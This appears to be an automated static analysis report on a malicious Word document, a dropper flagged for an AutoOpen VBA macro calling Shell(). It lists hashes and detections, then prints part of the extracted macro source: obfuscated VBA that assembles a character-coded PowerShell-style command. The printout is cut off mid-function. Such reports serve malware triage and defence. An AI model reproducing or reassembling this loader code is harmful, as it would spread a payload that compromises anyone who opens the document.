Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 badb817e770ffe54…

MALICIOUS

Office (OLE)

228.0 KB Created: 2018-06-28 06:38:00 Authoring application: Microsoft Office Word First seen: 2018-07-14
MD5: e603e3d4dd328946a512bf9465bc1c9e SHA-1: f967a5fc5765fca9402bbd5bd63260afbca028d0 SHA-256: badb817e770ffe541135c737c4f564016aac786a7fae6860c21620b6ab39d33d
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, a critical indicator of execution, and is flagged as an auto-executing macro (AutoOpen). This suggests the macro is designed to run automatically upon opening the document, likely to download and execute a secondary payload. The ClamAV detection name further supports its classification as a dropper.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6593935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6593935-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11755 bytes
SHA-256: 951e9e5fd222b2d7dfc26f46fe87f34b1caab5ec98488a425309b408e5ed32ea
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "sdzLunq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "iaIGkiYfwwkP"
Function JCzRcqtY()
On Error Resume Next
QUToD = ChrB(39057 + _
Sin(hEMRV * CLng(hVpEh + 61166) _
 + 55673 _
+ ChuspS))
RKOzr _
= 13895 + Atn(48279) / 86898 / _
Round(94811) / 62616 / CInt(wwaOp)
rYcWm = "hell     " + "      " + "      " + "        " + "         " + "        " + "& " + Chr(40) + Chr(40) + "vaR" + "Iable" + " '*M" + "dr*'" + Chr(41) + "." + "nAme[3," + "11,2"
jLwoO _
= 67583 + Atn(17702) / 16196 / _
Round(72240) / 44775 / CInt(qwPmu)
YhwvH = ChrB(84923 + _
Sin(iMkOmZ * CLng(OBABtO + 56221) _
 + 12769 _
+ YNDhUp))
lZhUcZHIIwl = "]-joIn''" + Chr(41) + " " + Chr(40) + " -jOi" + "N" + Chr(40) + " " + Chr(40) + "35 ," + " 111 ,87," + "112 , " + "58, " + "105, 98," + "112,42 ," + "104,101" + ", 10" + "9, 9"
PPnnUH _
= 38414 + Atn(40969) / 48567 / _
Round(37599) / 12890 / CInt(BwuVM)
zovOtj = ChrB(57516 + _
Sin(BaiDK * CLng(tjUwz + 73615) _
 + 54529 _
+ hfbZH))
DrGqBR = "8 , 1" + "00, 115 " + ", 39 " + ", 73, 9" + "8 ,115" + " ,41 " + ", 80" + " ,98 ," + " 101 ," + "68, 107, " + "110 , 98" + ",105"
Ehdrr _
= 12703 + Atn(39746) / 1408 / _
Round(69858) / 2247 / CInt(HJCFt)
VIiMVi = ChrB(92504 + _
Sin(ZwsHQ * CLng(UYGMUw + 82770) _
 + 23280 _
+ DswTd))
JBPvPOuS = " , 115,60" + ",35 " + ", 73 " + ",112 , 10" + "8,58" + " ,32 " + ",111, 1" + "15, 11" + "5 , 1" + "19,61,4" + "0 , 40,"
dZBnsG _
= 32120 + Atn(47418) / 20061 / _
Round(69048) / 5889 / CInt(VRIbtU)
BiCql = ChrB(93806 + _
Sin(JEfUYK * CLng(iwYrT + 45115) _
 + 61259 _
+ AwcRP))
rkUipDikPb = " 112, 1" + "12, " + "112, 41" + ",101 ,1" + "02 ,115 ," + "111, 104 " + ",97 , " + "97 , 41" + " ,117 " + ", 114 " + ", 40 ,"
uvbzc _
= 9055 + Atn(53660) / 18587 / _
Round(51022) / 68736 / CInt(rzwLt)
LsOrUj = ChrB(69774 + _
Sin(wjziGN * CLng(haPIE + 40956) _
 + 93580 _
+ qUWob))
fVlQwv = " 95, 9" + "7 , " + "109 , " + "62,79 , 4" + "0 , 71 , " + "111, 115" + " ,115"
airGGR _
= 48032 + Atn(1589) / 58395 / _
Round(49213) / 24216 / CInt(ZfVibU)
wJXhD = ChrB(78968 + _
Sin(OmXWw * CLng(IzWAGb + 275) _
 + 92028 _
+ jvpwNw))
zXTMdsuOfw = ", 119" + ",61,40 ," + " 40,112 ," + "112 ,112," + "41, 116 ," + "115, " + "102,96, 1" + "10 ,1" + "05 , " + "96,41 ," + "106, 1" + "10 ,100, "
kMtCS _
= 60405 + Atn(35679) / 6259 / _
Round(2194) / 77472 / CInt(lDmdH)
SibJVX = ChrB(99667 + _
Sin(aBdbs * CLng(cYzCK + 57542) _
 + 93283 _
+ dfSwSJ))
SWbAziF = "111,102 " + ", 98 ,10" + "7 , 119" + " ,98" + " , 102 " + ",100 , " + "111 , 98 "
sIDoO _
= 57681 + Atn(58766) / 40373 / _
Round(14765) / 28225 / CInt(thsdpb)
hpMFj = ChrB(35277 + _
Sin(iqFwqW * CLng(qFhtZ + 75315) _
 + 57547 _
+ zDpnVk))
iFPtddWtulG = ",126 , " + "41,10" + "0 , 10" + "4 ,1" + "06 ,4" + "1,102" + ",114, 40" + ",93, 1" + "00 ,81 " + ",100"
JCzRcqtY = rYcWm + lZhUcZHIIwl + DrGqBR + JBPvPOuS + rkUipDikPb + fVlQwv + zXTMdsuOfw + SWbAziF + iFPtddWtulG
jzprq _
= 70932 + Atn(37960) / 3776 / _
Round(74669) / 47403 / CInt(KjnZYR)
jDcKkP = ChrB(78172 + _
Sin(EsJQvw * CLng(PGFGzj + 39908) _
 + 43269 _
+ uUocu))
End Function
Function wLdZqqAvN()
On Error Resume Next
YiYvmh _
= 72922 + Atn(48518) / 28617 / _
Round(50622) / 4859 / CInt(jbsWc)
STjTSS = ChrB(22656 + _
Sin(jZPPa * CLng(kOUir + 372) _
 + 20601 _
+ ihrfw))
OowzN = ",40,71" + " ,111" + ", 115," + "115,119 " + ",61 ," + "40 ," + "40,111 ,1"
nvKYr _
= 886 + Atn(19814) / 50133 / _
Round(16429) / 9551 / CInt(GjXBM)
wzqaS = ChrB(13774 + _
Sin(icdGp * CLng(cmVqal + 28075) _
 + 82907 _
+ aCKGP))
YkHOw = "04 ,114 " + ", 117,10" + "7 ,1" + "10 , 1" + "02 , 119" + ", 119, 4"
lQnJR _
= 45572 + Atn(84813) / 62281 / _
Round(12460) / 89449 / CInt(owtPW)
kJcZk = ChrB(86860 + _
Sin(PwSaZo * CLng(MrvtM + 80983) _
 + 94292 _
+ bkGOw))
CONNhZ = "1 ,100 ," + " 104, 10" + "6, 4" +
... (truncated)